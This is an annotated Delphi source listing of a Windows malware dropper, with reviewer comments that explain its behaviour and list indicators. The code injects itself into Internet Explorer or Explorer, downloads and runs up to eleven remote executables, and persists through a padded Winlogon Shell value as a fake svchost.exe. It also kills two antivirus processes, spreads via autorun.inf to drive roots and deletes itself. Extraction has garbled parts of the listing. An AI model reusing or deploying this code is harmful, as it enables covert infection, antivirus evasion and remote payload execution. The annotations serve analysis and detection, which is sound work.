
 program InjectTheSelf;
// NOTE(review): this is the source of a self-copying downloader/dropper as
// pasted on a web page. The listing is garbled by extraction in places
// (missing ']' and ',' separators, e.g. the sysdir array bound below and the
// '...'0nil argument lists in Download), so it does not compile as shown.
// It is annotated here for analysis only; nothing is repaired.

// Fixed image base. Inject (below) copies the running image into another
// process at the SAME address it occupies here and never relocates it, so
// pinning the base is presumably what keeps the copy's absolute addresses
// valid — inferred from Inject's VirtualFreeEx/VirtualAllocEx at Module,
// not stated anywhere in the listing.
{$IMAGEBASE $13140000}

uses
  Windows,
  SysUtils,
  urlmon,      // URLDownloadToFile (Download)
  sendmail,    // not a standard unit and not part of this listing; appears unreferenced below
  shellapi,    // ShellExecute (main-block beacons)
  tlhelp32;    // process snapshot API (Killpro)

var
MSG:TMSG;                           // message pump in the main block
kkk:
string;                             // value written to Winlogon\Shell (main block)
cTime: TDateTime;                   // only referenced from commented-out code
hModule, hModule_News: Pointer;     // unused in this listing
Extent, Size, ThreadId: longword;   // unused in this listing (Inject has its own local Size)
//ProcessHandle, Pid: longword;
sysdir:
array[0..145of char;                // Windows directory, filled by GetWindowsDirectory (']' lost in extraction)
ret2:HKEY;                          // Winlogon key handle (main block)
window:HWND;                        // IEFrame window handle (RunInject)
htimer1,k,n,main:integer;           // k / main: sleeps in ms derived from time / timemain below
//time:pchar='5';
//timemain:pchar='5';
// Behaviour "knobs" and URL slots. They are PChar literals, the URLs padded
// with spaces, which suggests they are meant to be patched inside the built
// binary rather than edited in source — an inference; the page shows no builder.
time:pchar
='999';          // seconds between successive downloads (k)
timemain:pchar
='9999';         // seconds to wait before the first download (main)
kill:pchar
='1';            // '1' = do NOT terminate the two AV processes named in the main block
infectl:pchar
='1';            // '1' = do NOT arm the timer that runs infect()
static:pchar
='1';            // '1' = do NOT open the urlfirst / urldown / urlupdate beacons via IE
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1:  pchar='http://www.16518.net/test/1.exe';
// urllabel: fetched first, to C:\program files\temp.tmp; its presence gates the rest of Download
urllabel: pchar 
='http://                                                                                                                                                                                                                             ';
// url1..url11: payloads fetched to C:\Program Files\system1..11.exe and run by Download
url1:  pchar 
='http://                                                                                                                                                                                                                              ';
url2:  pchar 
='http://                                                                                                                                                                                                                              ';
url3:  pchar 
='http://                                                                                                                                                                                                                              ';
url4:  pchar 
='http://                                                                                                                                                                                                                              ';
url5:  pchar 
='http://                                                                                                                                                                                                                              ';
url6:  pchar 
='http://                                                                                                                                                                                                                              ';
url7:  pchar 
='http://                                                                                                                                                                                                                              ';
url8:  pchar 
='http://                                                                                                                                                                                                                              ';
url9:  pchar 
='http://                                                                                                                                                                                                                              ';
url10: pchar 
='http://                                                                                                                                                                                                                              ';
url11: pchar 
='http://                                                                                                                                                                                                                              ';
// urlfirst / urldown / urlupdate: opened through Iexplore.exe as beacons on
// first install, after Download has been injected, and on self-update
// respectively (matching the commented-out status strings in the main block)
urlfirst:  pchar 
='http://                                                                                                                                                                                                                              ';
urldown:  pchar 
='http://                                                                                                                                                                                                                              ';
urlupdate: pchar 
='http://                                                                                                                                                                                     ';
delself:pchar
='1';            // '1' = do NOT run ExtDelMe (self-deletion) afterwards

//获取文件大小

{
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;

//获取本机IP
procedure nametoIP;
type
  TaPInAddr = array[0..255] of PInAddr;
  PaPInAddr = ^TaPInAddr;
var
  phe: PHostEnt;
  pptr: PaPInAddr;
  Buffer: array[0..63] of char;
  i: integer;
  GInitData: TWSADATA;
  temp:string;
begin
  wsastartup($101, GInitData);
  Temp := '';
  GetHostName(Buffer, SizeOf(Buffer));
  phe := GetHostByName(buffer);
  if not assigned(phe) then
    exit;
  pptr := PaPInAddr(Phe^.h_addr_list);
  i := 0;
  while pptr^[I] <> nil do begin
    Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
    inc(i);
  end;
  Delete(Temp, Length(Temp), 1);
  try
    trueip :=Temp;
  except
  end;
  wsacleanup;
end;
      
}

procedure tlabel();
// Writes the literal 'first run' into C:\program files\label.tmp. The main
// block calls this on first install and deletes the file again after the
// injection step, so it is only a short-lived "first run" marker.
// Triage artifact: a file named label.tmp directly under C:\program files.
var
f:textfile;
i:integer;            // unused
buffer,disk:          // disk is unused
string;

begin

buffer:
='first run';
Assignfile(F,
'C:\program files\label.tmp');
if not FileExists('C:\program files\label.tmp') Then
begin
Rewrite(F);           // create and close; the file is reopened by the Rewrite below
Closefile(F);
End
Else  Assignfile(F,
'C:\program files\label.tmp');
{$I-}
Rewrite(F);           // (re)creates the file; I/O errors are checked by hand via IOResult
{$I+}
If IOResult
<> 0 Then  exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);

Closefile(F);
end;



procedure Download; // download routine
// Entry point of the remote thread that RunInject starts inside
// iexplore.exe / explorer.exe (see Inject), so every download and WinExec
// below is performed by that host process, not by this executable.
// Waits `main` ms, fetches urllabel to C:\program files\temp.tmp as a gate
// and, if that file appeared, fetches url1..url11 to
// C:\Program Files\systemN.exe and runs each, sleeping `k` ms in between.
// Lines of the form '...'0nil are extraction-garbled: the separators between
// the path, the reserved 0 and the nil callback were lost.
// Detection angle: a browser or shell process writing executables under
// C:\Program Files and launching them. No return value is checked anywhere.
begin
sleep(main);
URLDownloadToFile(
nil,urllabel, 'C:\program files\temp.tmp'0nil);
//WinExec('C:\program files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:\Program Files\temp.tmp'then   // gate: only continue if the first fetch produced a file
begin

URLDownloadToFile(
nil, url1, 'c:\Program Files\system1.exe'0nil);
WinExec(
'c:\Program Files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);


URLDownloadToFile(
nil, url2, 'c:\Program Files\system2.exe'0nil);
WinExec(
'c:\Program Files\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);


URLDownloadToFile(
nil, url3, 'c:\Program Files\system3.exe'0nil);
WinExec(
'c:\Program Files\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);

URLDownloadToFile(
nil, url4, 'c:\Program Files\system4.exe'0nil);
WinExec(
'c:\Program Files\system4.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url5, 'c:\Program Files\system5.exe'0nil);
WinExec(
'c:\Program Files\system5.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url6, 'c:\Program Files\system6.exe'0nil);
WinExec(
'c:\Program Files\system6.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url7, 'c:\Program Files\system7.exe'0nil);
WinExec(
'c:\Program Files\system7.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url8, 'c:\Program Files\system8.exe'0nil);
WinExec(
'c:\Program Files\system8.exe', SW_SHOW); //SW_SHOW or SW_HIDE

// this condition only gates the sleep; the url9 fetch below runs regardless
if FileExists('c:\Program Files\label.tmp'then
sleep(k);

URLDownloadToFile(
nil, url9, 'c:\Program Files\system9.exe'0nil);
WinExec(
'c:\Program Files\system9.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);
begin                   // bare compound statement; it does not change control flow
URLDownloadToFile(
nil, url10, 'c:\Program Files\system10.exe'0nil);
WinExec(
'c:\Program Files\system10.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url11, 'c:\Program Files\system11.exe'0nil);
WinExec(
'c:\Program Files\system11.exe', SW_SHOW); //SW_SHOW or SW_HIDE


end;
end;
end;


procedure infect();
// Drive-root dropper, invoked from TimerProc1 on every timer tick when the
// infectl knob is not '1'. Stages an autorun.inf whose [AutoRun] section
// points at pagefile.pif, then for every drive letter c..z whose
// GetDriveType result is 3 (DRIVE_FIXED) copies the staged autorun.inf and a
// copy of this executable (named pagefile.pif) to the drive root, marks both
// hidden+system, and finally removes the staging file from C:\program files.
// The last copyfile argument `true` means "fail if the destination exists",
// so already-present root files are left alone. No return value is checked.
// On-disk indicator: a hidden+system autorun.inf / pagefile.pif pair at a
// drive root; autorun processing being disabled is the mitigation.
var
f:textfile;
i:integer;
buffer,disk:
string;
begin
begin

buffer:
='[AutoRun]'+#13#10+'open=pagefile.pif';
Assignfile(F,
'C:\program files\autorun.inf');
if not FileExists('C:\program files\autorun.inf') Then
begin
Rewrite(F);           // create and close; reopened by the Rewrite below
Closefile(F);
End
Else  Assignfile(F,
'C:\program files\autorun.inf');
{$I-}
Rewrite(F);
{$I+}
If IOResult
<> 0 Then  exit;           // staging file could not be created: nothing is dropped
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);

Closefile(F);
end;

for i:= ord('c'to ord('z'do   // garbled: ')' separators lost in extraction
begin
disk:
=chr(i);
if getdrivetype(pchar(disk+':\'))=3 then   // 3 = DRIVE_FIXED
begin
copyfile(
'C:\program files\autorun.inf',pchar(disk+':\autorun.inf'),true);

copyfile(pchar(paramstr(
0)),pchar(disk+':\pagefile.pif'),true);   // copy of this executable

SetFileAttributes(pchar(disk
+':\autorun.inf'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);

SetFileAttributes(pchar(disk
+':\pagefile.pif'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
end;
deletefile(
'C:\program files\autorun.inf');   // remove the staging copy
end;
function GetFileSize(const FileName: String): LongInt;
// Returns the size of FileName as reported by FindFirst, or -1 when nothing
// matches. Used by the main block's size "self-check" gates.
// FindClose is never called after a successful FindFirst, so the search
// handle leaks on every call.
var SearchRec: TSearchRec;
begin
if FindFirst(ExpandFileName(FileName), faAnyFile, SearchRec) = 0 then
Result :
= SearchRec.Size
else
Result :
= -1;
end;
function  Killpro(ExeFileName:  string):  integer;
// Terminates every running process whose image name matches ExeFileName
// (case-insensitive, by base name or by full path) using a Toolhelp32
// snapshot. Returns the result of the LAST TerminateProcess attempted
// (0 if nothing matched); earlier failures are not reported.
// The handle from OpenProcess is never closed; the snapshot handle is.
// Callers: the main block uses it against two AV monitor processes (when
// kill<>'1') and against the existing svchost.exe copy on update — note the
// base-name match hits every process called svchost.exe, including the
// legitimate service hosts — and ExtDelMe uses it on this executable itself.
const  PROCESS_TERMINATE=$0001;
var ContinueLoop:BOOL;
    FSnapshotHandle:THandle;
    FProcessEntry32:TProcessEntry32;
begin
  result:
=0;
  FSnapshotHandle:
=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  FProcessEntry32.dwSize:
=Sizeof(FProcessEntry32);
  ContinueLoop:
=Process32First(FSnapshotHandle,  FProcessEntry32);
  
while  integer(ContinueLoop)<>0  do
    
begin
      
// match either on base name (case-insensitive) or on the exact full path
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile))=ExtractFileName(UpperCase(ExeFileName)))
      
or (UpperCase(FProcessEntry32.szExeFile)  =UpperCase(ExeFileName)))  then
      Result:
=Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE,BOOL(0),FProcessEntry32.th32ProcessID),0));
      ContinueLoop  :
=  Process32Next(FSnapshotHandle,FProcessEntry32);
  
end;
  CloseHandle(FSnapshotHandle);
end;


procedure ExtDelMe;
// Self-deletion helper, run only when the delself knob is not '1'.
// Writes <windir>\Deleteme.bat, which loops deleting ParamStr(0) until the
// file is gone and then deletes itself, starts the batch hidden via
// CreateProcess, and then terminates this process with Killpro so the
// delete can succeed.
// Artifacts: Deleteme.bat in the Windows directory and a hidden command
// interpreter started from there. The ProcessInfo handles are never closed
// (the CloseHandle calls are commented out).
var
  F: textfile;
  BatchFileName: 
string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  GetwindowsDirectory(sysdir,
145);
  
//DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp''NoRealMode');
  BatchFileName :
= sysdir + '\Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, 
':try');
  WriteLn(F, 
'del "' + ParamStr(0+ '"');                      // garbled: ')' lost after ParamStr(0
  WriteLn(F, 
'if exist "' + ParamStr(0+ '"' + ' goto try');   // retry until the executable is unlocked
  WriteLn(F, 
'del %0');                                       // the batch removes itself last
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $
00);
  StartUpInfo.dwFlags :
= STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow :
= SW_HIDE;
  
if CreateProcess(nil, PChar(BatchFileName), nilnil, False, IDLE_PRIORITY_CLASS, nilnil, StartUpInfo, ProcessInfo) then
  
begin
  Killpro(pchar(paramstr(
0)));                                           // terminate ourselves so the batch can delete the file
    
//CloseHandle(ProcessInfo.hThread);
    
//CloseHandle(ProcessInfo.hProcess);
  
end;
end;

function GetIEAppPath:string;
// Resolves the Internet Explorer executable from the default value of
// HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE and
// falls back to the hard-coded Program Files path when the query fails.
// The RegOpenKeyEx result is not checked, KEY_ALL_ACCESS is requested for
// what is only a read, and RegCloseKey runs even if the open failed.
// Used by RunInject to start a hidden IE instance to inject into.
var
iekey: Hkey;
iename: 
array [0..255of char;      // garbled: ']' lost in extraction
vType,dLength :DWORD;
begin
vType :
= REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength :
= SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result :
= iename
else
Result :
= 'C:\Program Files\Internet Explorer\IEXPLORE.EXE';   // fallback when the registry lookup fails
RegCloseKey(iekey);
end;

procedure TimerProc1(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
// TIMERPROC callback armed by the main block when the infectl knob is not
// '1'; every tick re-runs infect() (the drive-root autorun.inf dropper).
// Only fires while the main block's GetMessage loop is pumping.
begin
infect();
end;


procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
// Copies this process's entire image into the target process at the SAME
// base address and starts a remote thread there at EntryPoint (RunInject
// passes @Download). No relocation is performed; the copy can only work
// because the image base is pinned by the {$IMAGEBASE} directive at the top
// of the unit (inferred — confirm).
// Telemetry sequence to look for: VirtualFreeEx(MEM_RELEASE) +
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) + WriteProcessMemory +
// CreateRemoteThread on a handle to explorer.exe / iexplore.exe.
// No return value is checked: if the allocation at the requested base fails,
// the write and the thread creation still go ahead with NewModule = nil.
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// GetModuleHandle(nil) yields the base address of this process's own image
Module :
= Pointer(GetModuleHandle(nil));
// size of the in-memory image, read from the PE optional header:
// DOS header -> e_lfanew -> skip the PE signature and file header -> SizeOfImage
Size :
= PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) 
+ SizeOf(TImageFileHeader))).SizeOfImage;
// release whatever the target has mapped at this base so the range can be reused
VirtualFreeEx(ProcessHandle, Module, 
0, MEM_RELEASE);
// reserve+commit the same range in the target as read/write/execute
NewModule :
= VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// copy the image bytes across; BytesWritten is never inspected
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// start EntryPoint in the target with Module as its argument; injection is complete
createRemoteThread(ProcessHandle, 
nil0, EntryPoint, Module, 0, TID);   // garbled: ',' lost between nil and 0
end;

//关联EXE


procedure RunInject(InjType:integer);
// Chooses a host process and injects Download into it.
//   InjType = 0: explorer.exe, located through its Shell_TrayWnd taskbar window.
//   InjType <> 0: iexplore.exe, located through an IEFrame window; if none
//     exists a hidden IE is started from GetIEAppPath and the code waits
//     500 ms before looking once more (no retry — if IE is still not up,
//     PID keeps its uninitialised value).
// Opens the target with PROCESS_ALL_ACCESS, calls Inject, closes the handle.
// StartupInfo / ProcessInfo are only used by the commented-out CreateProcess.
var
ProcessHandle, PID: longword;
StartupInfo: TStartupInfo;
ProcessInfo: TProcessInformation;

begin
if InjType=0 then // inject into explorer.exe
begin
// PID of the explorer process; Shell_TrayWnd is the taskbar window class (found with Spy++)
GetWindowThreadProcessId(FindWindow(
'Shell_TrayWnd'nil), @Pid);   // garbled: ',' lost before nil
end
else // inject into iexplore.exe
begin
Window:
=FindWindow('IEFrame',nil);
if window = 0 then    winexec(PChar(GetIEAppPath),sw_hide);   // start a hidden IE when none is running
//createProcess(nil,PChar(GetIEAppPath), nilnil, False, 0nilnil, StartupInfo, ProcessInfo);
sleep(
500);
GetWindowThreadProcessId(FindWindow(
'IEFrame'nil), @Pid);         // garbled: ',' lost before nil
end;
// open the target process
ProcessHandle :
= OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
// release the process handle
CloseHandle(ProcessHandle);

end;




begin
// Program entry. Order of operations — note the single-instance mutex check
// only comes after the install/update steps, so those run in every instance:
//   1. If <windir>\svchost.exe (this program's persistence copy, named after
//      the legitimate System32 binary) exists and its size differs from ours,
//      treat this as an update: kill it, replace it, relaunch it hidden,
//      optionally beacon urlupdate, optionally self-delete.
//   2. Remove leftovers: C:\Program Files\system1..11.exe and temp.tmp.
//   3. If the persistence copy does not exist (first install): copy self
//      there, optionally kill two AV monitors, optionally beacon urlfirst,
//      set the Winlogon Shell value to 'Explorer.exe ... svchost.exe', run the
//      copy hidden, write label.tmp, optionally self-delete.
//   4. Mutex 'system' for single instance, inject Download into IE
//      (RunInject(1)), beacon urldown, optionally arm the infect timer, and
//      pump messages forever.
// Indicators for responders, all taken from this listing: svchost.exe in the
// Windows directory rather than System32; a Winlogon\Shell value ending in
// 'svchost.exe'; a mutex named 'system'; C:\Program Files\label.tmp,
// temp.tmp and systemN.exe; Deleteme.bat (see ExtDelMe).
// The `static<>'1'` tests compare a PChar with a literal; whether that is a
// text or a pointer comparison depends on the compiler, so when listing
// network indicators assume the IE-launched beacons may fire regardless of
// the knob. The three "self-check" size gates are extraction-garbled
// (`>29000and`, `55296then`).
{cTime := Now();
host:=DateToStr(cTime) + '-' + TimeToStr(cTime);
nametoIP;
ip:='主机:'+gethostnam+'---------IP地址:'+trueip+'---成功下载';
ip1:='主机:'+gethostnam+'---------IP地址:'+trueip+'---首次安装';
  ip2:='主机:'+gethostnam+'---------IP地址:'+trueip+'---服务端升级'; 
}

  GetwindowsDirectory(sysdir,
145);
if FileExists(sysdir+'\svchost.exe'then     // persistence copy already present
begin
// self-check: size gate on our own image
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
if getfilesize(pchar(sysdir+'\svchost.exe'))<>getfilesize(pchar(paramstr(0))) then  // sizes differ -> treat as an update
begin
killpro(
'svchost.exe');                  // base-name match: also terminates the legitimate service hosts
deletefile(pchar(sysdir
+'\svchost.exe'));
copyfile(pchar(paramstr(
0)),pchar(sysdir+'\svchost.exe'),true);
WinExec(pchar(sysdir
+'\svchost.exe'), SW_HIDE);
//tlabel(); // an upgrade does not count as a first download

if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlupdate,nil,SW_hide);   // update beacon via IE

//sleep(6000);
if  strtoint(delself)<>1  then ExtDelMe;

end;
end;



k:
=strtoint(time)*1000;                  // delay between downloads, ms
main:
=strtoint(timemain)*1000;              // delay before the first download, ms
n:
=0;
repeat                                 // remove previously dropped payloads system1..system11.exe
n:
=n+1;
begin
DeleteFile(
'c:\Program Files\system'+inttostr(n)+'.exe');  //1
end;
  
until
  n
>11;
if FileExists('c:\Program Files\temp.tmp'then  deletefile ('c:\Program Files\temp.tmp');


  GetwindowsDirectory(sysdir,
145);

  
if not FileExists(sysdir+'\svchost.exe'then   // first install
  
begin
  
// self-check: size gate on our own image
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
      copyfile(pchar(paramstr(
0)),pchar(sysdir+'\svchost.exe'),true);
      
if strtoint(kill)<>1 then              // terminate two AV monitors when the kill knob is not '1'
      
begin
      killpro(
'kvmonxp.exe');// Jiangmin antivirus
      killpro(
'ravmon.exe')// Rising antivirus
      
end;
      
if static<>'1' then  shellexecute(0,'open','Iexplore.exe',urlfirst, nil, SW_HIDE);   // first-install beacon via IE
// Persistence: the Winlogon Shell value normally holds 'Explorer.exe'. The
// value written here keeps the real shell and appends the copy's name after a
// long run of spaces, presumably so Winlogon also starts svchost.exe (resolved
// through the search path, where the Windows directory precedes System32?) and
// so the extra entry is not obvious when the value is viewed — both inferred,
// confirm on a test system.
kkk:
= 'Explorer.exe                                                                                                                                                                                                            svchost.exe';
RegCreateKey(HKEY_LOCAL_MACHINE,
'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',ret2);
RegSetValueEx(Ret2,
'Shell'0, REG_SZ,pchar(kkk), Length(pchar(kkk))+ 1);   // garbled: ',' lost after 'Shell'
//MessageBox(0'完成''提示', mb_iconinformation);
RegCloseKey(Ret2);
      WinExec(pchar(sysdir
+'\svchost.exe'), SW_HIDE);
      tlabel();                        // drop the 'first run' marker
      
//sleep(6000);
  
if  strtoint(delself)<>1  then ExtDelMe;
  
end;

{// EXE association: use the passed-in parameter
if ParamCount> 0 then
begin
origin;
winexec(pchar(ParamStr(1)),sw_show);
reg;
end; 
}
CreateMutex(
nil, True,'system');// named mutex as a single-instance guard
if (GetlastError()= ERROR_ALREADY_EXISTS) then halt;   // a second instance stops here — but only after the steps above

//MessageBox(0'启动完成''提示', mb_iconinformation);

// self-check: size gate on our own image
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
RunInject(
1); // 1 = inject into iexplore.exe, 0 = inject into explorer.exe
if FileExists('c:\Program Files\label.tmp'then  deletefile ('c:\Program Files\label.tmp');
if static<>'1' then shellexecute(0'open''Iexplore.exe', urldown, nil, SW_HIDE);   // "downloaded" beacon via IE



if strtoint(infectl)<>1 then hTimer1 := SetTimer(0030, @TimerProc1);   // arm the infect() timer; argument separators lost in extraction

while(GetMessage(Msg,0,0,0))do  // message pump: required, otherwise the TIMER callback never fires
begin
  TranslateMessage(Msg);
  DispatchMessage(Msg);
end;                   

end.